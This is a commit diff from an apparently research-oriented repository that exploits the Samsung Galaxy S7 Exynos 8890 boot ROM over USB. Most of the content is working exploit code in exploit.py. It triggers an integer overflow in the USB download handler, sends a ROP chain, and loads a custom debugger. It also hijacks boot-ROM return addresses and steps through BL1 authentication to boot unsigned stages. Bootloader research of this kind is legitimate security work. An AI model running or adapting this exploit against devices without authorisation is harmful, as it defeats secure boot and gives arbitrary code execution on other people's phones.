EljakimHerrewijnen/Samsung_S7
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Now booting into USB recovery. Not yet jumping back to the debugger at each boot stage

Browse Source
This commit is contained in:
Jonathan Herrewijnen 2024-08-16 18:15:53 +02:00
parent dc64defded
commit 55da2ce981
2 changed files with 151 additions and 126 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
source/exploit/.vscode/launch.json vendored
View File

@ -28,7 +28,16 @@
"program": "exploit.py", "program": "exploit.py",
"console": "integratedTerminal", "console": "integratedTerminal",
"justMyCode": false, "justMyCode": false,
"args": ["--boot"] "args": ["--unsecure-boot"]
},
{
"name": "Run debugger boot",
"type": "debugpy",
"request": "launch",
"program": "exploit.py",
"console": "integratedTerminal",
"justMyCode": false,
"args": ["--debugger-boot"],
}, },
{ {
"name": "Debug current file", "name": "Debug current file",

266
source/exploit/exploit.py
View File

@ -86,7 +86,7 @@ class ExynosDevice():
sys.exit(0) sys.exit(0)
else: else:
raise e raise e
# claim usb interface # claim usb interface
self.handle.claimInterface(0) self.handle.claimInterface(0)
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}") print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
@ -98,12 +98,14 @@ class ExynosDevice():
self.context.exit() self.context.exit()
def write(self, data): def write(self, data):
"""Write data to the device"""
transferred = ctypes.c_int() transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
assert(res == 0), "Could not perform bulk transfer" assert(res == 0), "Could not perform bulk transfer"
return res return res
def send_empty_transfer(self): def send_empty_transfer(self):
"""Send an empty transfer (to not actually write data)"""
transferred = ctypes.c_int() transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
assert(res == 0) assert(res == 0)
@ -127,6 +129,7 @@ class ExynosDevice():
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
def test_bug(self): def test_bug(self):
"""Verify bug existence"""
# Start by sending a valid packet # Start by sending a valid packet
# Integer overflow in the size field # Integer overflow in the size field
# unk + size + payload + header # unk + size + payload + header
@ -147,39 +150,45 @@ class ExynosDevice():
TODO not working TODO not working
''' '''
# construct dl_data # construct dl_data
dpayload = struct.pack("<II", 0, len(payload) + 8 + 2) dpayload = struct.pack("<II", 0, (len(payload) + 8 + 2))
dpayload = dpayload + payload + b"\x00" * 2 # add footer dpayload = dpayload + payload + b"\x00" * 2 # add footer
transferred = ctypes.c_int() transferred = ctypes.c_int()
for block in range(0, len(dpayload), BLOCK_SIZE): for block in range(0, len(dpayload), BLOCK_SIZE):
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
assert res == 0, "Error sending payload" assert res == 0, "Error sending payload"
p_ok("Sended stage") p_ok("Sent stage")
def unsecure_boot(self):
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read()) def unsecure_boot(self, exploit=False):
time.sleep(2) '''
self.connect_device() Do a normal boot process, with or without exploit.
'''
if exploit:
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
time.sleep(2)
self.connect_device()
# self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin") # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
# wait_disconnect() # wait_disconnect()
time.sleep(2) time.sleep(2)
self.connect_device() self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
pass pass
def exploit(self, payload: bytes): def exploit(self, payload: bytes):
''' '''
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
@ -234,7 +243,9 @@ class ExynosDevice():
transferred = ctypes.c_int(0) transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
assert res == 0, "Error sending ROP chain" assert res == 0, "Error sending ROP chain"
return
def usb_write(self, data): def usb_write(self, data):
assert len(data) <= 0x200, "Data too big" assert len(data) <= 0x200, "Data too big"
transferred = ctypes.c_int() transferred = ctypes.c_int()
@ -243,13 +254,15 @@ class ExynosDevice():
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}" assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
return transferred.value return transferred.value
def usb_read(self, size): def usb_read(self, size):
transferred = ctypes.c_int() transferred = ctypes.c_int()
buf = ctypes.c_buffer(b"", size) buf = ctypes.c_buffer(b"", size)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
assert res == 0, f"Error receiving data {res}" assert res == 0, f"Error receiving data {res}"
return buf.raw[:transferred.value] return buf.raw[:transferred.value]
def setup_concrete_device(self, concrete_device : ConcreteDevice): def setup_concrete_device(self, concrete_device : ConcreteDevice):
#Setup architecture #Setup architecture
concrete_device.arch = QL_ARCH.ARM64 concrete_device.arch = QL_ARCH.ARM64
@ -265,6 +278,7 @@ class ExynosDevice():
#Overwrite all calls to make the concrete target function properly #Overwrite all calls to make the concrete target function properly
concrete_device.copy_functions() concrete_device.copy_functions()
def usb_debug(self): def usb_debug(self):
""" """
Function to debug USB behaviour. Sends and receives data in continuous flow. Function to debug USB behaviour. Sends and receives data in continuous flow.
@ -291,6 +305,7 @@ class ExynosDevice():
_recv_data() _recv_data()
count += 1 count += 1
def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False): def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
""" """
Dumps memory from the device. Dumps memory from the device.
@ -312,11 +327,6 @@ class ExynosDevice():
f.write(dumped) f.write(dumped)
return dumped return dumped
# transferred = ctypes.c_int()
# stack_pointer = 0x02021810
# for block in range(0x2020000, 0x2200000, 0x200):
# stack_pointer += 0x200
# dumped += self.cd.memdump_region(block, 0x200)
def setup_guppy_debugger(self): def setup_guppy_debugger(self):
""" """
@ -356,32 +366,34 @@ class ExynosDevice():
_initial_run_debugger() _initial_run_debugger()
_setup_debugger() _setup_debugger()
def relocate_debugger(self):
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def dumb_interact(self, dump_imems=False): def dumb_interact(self, dump_imems=False):
''' '''
Room for playing around with the debugger Room for playing around with the debugger on the phone.
''' '''
self.cd.arch_dbg.state.auto_sync = False self.cd.arch_dbg.state.auto_sync = False
self.cd.arch_dbg.state.auto_sync_special = False self.cd.arch_dbg.state.auto_sync_special = False
logger.debug('State after setting up initial debugger') logger.debug('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
def relocate_debugger():
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
self.cd.memwrite_region(0x020c0000, debugger_reloc)
self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
def first_debugger(): def first_debugger():
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read() debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
@ -390,20 +402,24 @@ class ExynosDevice():
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000) self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
# relocate_debugger() # self.relocate_debugger()
DEBUGGER_ADDR = 0x2069000 #0x020c0000 DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Get whereabouts of the debugger and current processor state
logger.debug('State after relocating debugger') logger.debug('State after relocating debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
def memdump_imem(): def memdump_imem():
"""
Dumps the internal memory of the device (0x2020000 - 0x2070000).
"""
dumped = b"" dumped = b""
for block in range(0x2020000, 0x2070000, 0x200): for block in range(0x2020000, 0x2070000, 0x200):
# print(hex(block)) # print(hex(block))
dumped += self.cd.memdump_region(block, 0x200) dumped += self.cd.memdump_region(block, 0x200)
return dumped return dumped
AUTH_BL1 = 0x00012848 AUTH_BL1 = 0x00012848 # Location of the authentication function
def auth_bl1(lr=0x2069000): def auth_bl1(lr=0x2069000):
# Load the firmware # Load the firmware
self.cd.arch_dbg.state.X0 = 1 self.cd.arch_dbg.state.X0 = 1
@ -413,18 +429,17 @@ class ExynosDevice():
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!" assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
BOOT_BL1 = 0x00019310 BOOT_BL1 = 0x00019310 # Location of the boot function
def boot_bl1(lr=0x2069000): def boot_bl1(lr=0x2069000):
self.cd.arch_dbg.state.LR = lr self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(BOOT_BL1) self.cd.restore_stack_and_jump(BOOT_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
JUMP_BL1 = 0x000002c0 JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
def jump_bl1(lr): def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1) self.cd.restore_stack_and_jump(JUMP_BL1)
# Always hijack rom_usb_download function: # Always hijack rom_usb_download function:
rom_usb_download = self.cd.memdump_region(0x020200dc, 4) rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
self.cd.memwrite_region(0x020200dc, p32(0x2069000)) self.cd.memwrite_region(0x020200dc, p32(0x2069000))
@ -432,7 +447,7 @@ class ExynosDevice():
# Try loading bl1 # Try loading bl1
bl1 = open("../S7/bl1.bin", "rb").read() bl1 = open("../S7/bl1.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl1) self.cd.memwrite_region(0x02021800, bl1)
self.usb_write(b"FLSH") # Flush cache self.usb_write(b"FLSH") # Flush cache, as Frederic does
self.cd.test_connection() self.cd.test_connection()
auth_bl1(DEBUGGER_ADDR) auth_bl1(DEBUGGER_ADDR)
# boot_bl1(DEBUGGER_ADDR) # boot_bl1(DEBUGGER_ADDR)
@ -462,39 +477,15 @@ class ExynosDevice():
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address) # self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR)) # self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
# Patch stupid error funciton # Patch stupid error function
# self.usb_write(b"FLSH") # Flush cache # self.usb_write(b"FLSH") # Flush cache
# Download next stage? # Download next stage?
lr = self.cd.arch_dbg.state.LR lr = self.cd.arch_dbg.state.LR
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
pass pass
# Using keystone, look for each msr instruction (AARCH64, LE)
# If wanting to modify the binary
# bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
imem1 = memdump_imem()
auth_bl1(0x020c0000)
# Dump memory
# imem2 = memdump_imem()
# with open("/tmp/imem1_bad.bin", "wb") as f:
# f.write(imem1)
# with open("/tmp/imem2_bad.bin", "wb") as f:
# f.write(imem2)
# Overwrite jump back to the debugger from functions encountered during jump_bl1 # Overwrite jump back to the debugger from functions encountered during jump_bl1
# self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address) self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
self.cd.memwrite_region(0x020200dc, p32(0x020c0000)) self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
@ -502,8 +493,6 @@ class ExynosDevice():
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}") print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
self.cd.restore_stack_and_jump(0x00000314) self.cd.restore_stack_and_jump(0x00000314)
jump_bl1(0x020c0000) jump_bl1(0x020c0000)
def handle_weird_brom(): def handle_weird_brom():
while True: while True:
@ -517,20 +506,13 @@ class ExynosDevice():
pass pass
handle_weird_brom() handle_weird_brom()
# Parse pagetables ### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
# self.cd.jump_to(0x2069000) # self.cd.jump_to(0x2069000)
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" # assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# self.cd.fetch_special_regs() # self.cd.fetch_special_regs()
# Address to download to
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
# testfun(0x2069000)
self.cd.arch_dbg.state.X0 = 1 self.cd.arch_dbg.state.X0 = 1
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR) self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
self.usb_read(0x200) # GiAs self.usb_read(0x200) # GiAs
@ -538,7 +520,8 @@ class ExynosDevice():
self.cd.arch_dbg.state.LR = 0x2069000 self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x00000314) self.cd.restore_stack_and_jump(0x00000314)
pass pass
### UXN and PXN seem to be present over the USB stack (02021800+)
shellcode = f""" shellcode = f"""
ldr x0, debugger_addr ldr x0, debugger_addr
blr x0 blr x0
@ -551,11 +534,7 @@ class ExynosDevice():
self.cd.jump_to(0x2021800) self.cd.jump_to(0x2021800)
pass pass
# load bl31
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger # bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
# # Write bl31 at 0x02021800 and authenticate # # Write bl31 at 0x02021800 and authenticate
auth_bl1(0x020c0000) auth_bl1(0x020c0000)
@ -564,23 +543,7 @@ class ExynosDevice():
jump_bl1(0x02021800) jump_bl1(0x02021800)
pass pass
# OLD # VERY OLD
def memdump_try():
self.cd.arch_dbg.state.LR = 0x020200e8
self.cd.restore_stack_and_jump(0x02021810)
stack_pointer = 0x02021810
dumped = b""
for block in range(0x2020000, 0x2200000, 0x200):
stack_pointer += 0x200
self.cd.arch_dbg.state.print_ctx()
print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
# self.cd.restore_stack_and_jump(0x02021810)
#000125b4 #000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished # self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
@ -588,36 +551,85 @@ class ExynosDevice():
# self.cd.restore_stack_and_jump(0x000125b4) # self.cd.restore_stack_and_jump(0x000125b4)
def debugger_boot(self):
auth_bl1() """
Boot into USB recovery mode using the debugger.
# auth_bl1() """
jump_bl1() ### Setup debugger
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?" self.setup_guppy_debugger()
self.cd.arch_dbg.state.print_ctx()
def jump_bl31():
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x02021810)
bl31 = open("../S7/bl31.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl31) self.cd.arch_dbg.state.auto_sync = False
jump_bl31() self.cd.arch_dbg.state.auto_sync_special = False
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?" logger.debug('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx() self.cd.arch_dbg.state.print_ctx()
DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Overwrite boot_usb_ra to our debugger
self.cd.test_connection()
hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
self.cd.memwrite_region(0x02020f60, p64(0x2069000))
### Set link register and boot into the USB function
BOOT_USB_FUNCTION = 0x000064e0
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.restore_stack_and_jump(BOOT_USB_FUNCTION)
time.sleep(1)
self.connect_device()
# Setup jump and authentication
AUTH_BL1 = 0x00012848
def auth_bl1(lr=0x2069000):
# Load the firmware
self.cd.arch_dbg.state.X0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
### Check if authentication was successful - X0 should not be 0??
# assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
JUMP_BL1 = 0x000002c0
def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1)
# Send boot stage 1
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
# memdump_try() assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# auth_bl1() auth_bl1(DEBUGGER_ADDR)
self.cd.arch_dbg.state.print_ctx() time.sleep(1)
#authenticate it self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)
self.usb_write(b"FLSH") # Flush cache
jump_bl1(DEBUGGER_ADDR)
time.sleep(2)
self.connect_device()
# self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
time.sleep(2)
self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
time.sleep(2)
self.connect_device()
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
time.sleep(2)
self.connect_device()
pass pass
if __name__ == "__main__": if __name__ == "__main__":
arg = argparse.ArgumentParser("Exynos exploit") arg = argparse.ArgumentParser("Exynos exploit")
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False) arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
arg.add_argument("--boot", action="store_true", help="Unsecure boot", default=False) arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
args = arg.parse_args() args = arg.parse_args()
exynos = ExynosDevice() exynos = ExynosDevice()
@ -629,13 +641,17 @@ if __name__ == "__main__":
# exynos.usb_debug() # exynos.usb_debug()
sys.exit(0) sys.exit(0)
if args.boot: if args.unsecure_boot:
exynos.unsecure_boot() exynos.unsecure_boot()
sys.exit(0) sys.exit(0)
stage1 = open("stage1/stage1.bin", "rb").read() stage1 = open("stage1/stage1.bin", "rb").read()
exynos.exploit(stage1) exynos.exploit(stage1)
if args.debugger_boot:
exynos.debugger_boot()
sys.exit(0)
exynos.setup_guppy_debugger() exynos.setup_guppy_debugger()
exynos.dumb_interact() exynos.dumb_interact()